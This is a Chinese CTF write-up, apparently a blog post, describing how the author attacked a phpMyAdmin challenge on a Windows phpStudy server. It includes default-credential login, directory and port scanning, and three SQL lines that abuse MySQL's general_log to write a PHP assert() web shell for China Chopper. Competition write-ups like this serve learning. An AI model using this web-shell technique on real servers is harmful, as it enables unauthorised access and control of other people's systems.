sctf算又是一个web狗饱受打击的比赛,web第一道fuzz了半天最后document被过滤,就不知道怎么弄了。最后一道phpmyadmin刚开始做的各种不顺,在最后一步各种卡壳,最后还是队友的菜刀好使。
tips:主办方说两个链接的环境一样,我感觉很明显不一样啊
第一个网址做的各种不顺
第二个稍微舒服一些
默认root/root就能登录进去
刚开始就全局数据库默认搜索,收到一个有关ctf的,不过里面啥东西也没有
然后就开始了各种踩坑,因为有些语句不能执行,后来自己又新建了一个administrater的账号(名字叫这个),
然后把自己修改最高权限,解除所有限制,结果还是未果
后来又继续偷偷的扫目录,扫出来一个好像是setup.php(名字记不得了,差不多这个意思)的东西,看了看
是可以修改一些权限的,不过当时自己也不是很懂,也没有乱修改
然后又开始找这个网站的域名,子域名,当然啥也没找到
继续扫描端口,发现开启了3389端口
然后思路初步就有了,利用了数据库写文件写到目录中,然后自己在用中国菜刀链接,如果直接就是最高权限,直接在整个电脑搜索flag,如果没有权限,就提权,顺便看看能不能修改注册表,可以的话直接传工具提取......(技术太菜,思路只能想到这么多)
然后就各种开始踩坑,各种无法写入数据
后来在刷群的时候无意间了解到了这个网站背后的服务器竟然是windows系统???????????????????
活这么大第一次见到windows系统的,也算很开阔了视野,不过看这个就是一个标准的phpstudy
image.png
标准的phpstudy三件套(mysql,apache,phpmyadmin)
在一次刷新了我的认识 .......
然后就开始各种踩坑了,也根据报错命令各种查资料
或者写了一个空文件,最后根据报错信息
在网上搜到了几篇相关度较高的博文,算是有一篇有用的,也开阔了自己的见识,
然后这个搜到了一篇类似原文的东西
https://bbs.ichunqiu.com/article-612-1.html
还有其他的一些,没啥用这里就不贴了
尝试了一下,第一个的默认路径在C盘
然后备用网址在D盘
(一般fuzz也可以fuzz到,服务器做的只有服务功能,一般都在根目录下)
然后根据可以根据简文直接上payload
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
默认cmd比较卡,改个名字就好了
1.png
然后第一次进去的时候权限贼低,不能查看其它目录,就想着提权,工具第一次上传成功了,但是对应的系统不对,然后继续上传其它的工具,然后很多搅屎棍一直在重置目录,3个小时也没上传成功,最后放弃了,
之后叫队友用中国菜刀一链接上直接就是最高权限???????
感觉自己不仅老了,菜刀也钝了.....
网友评论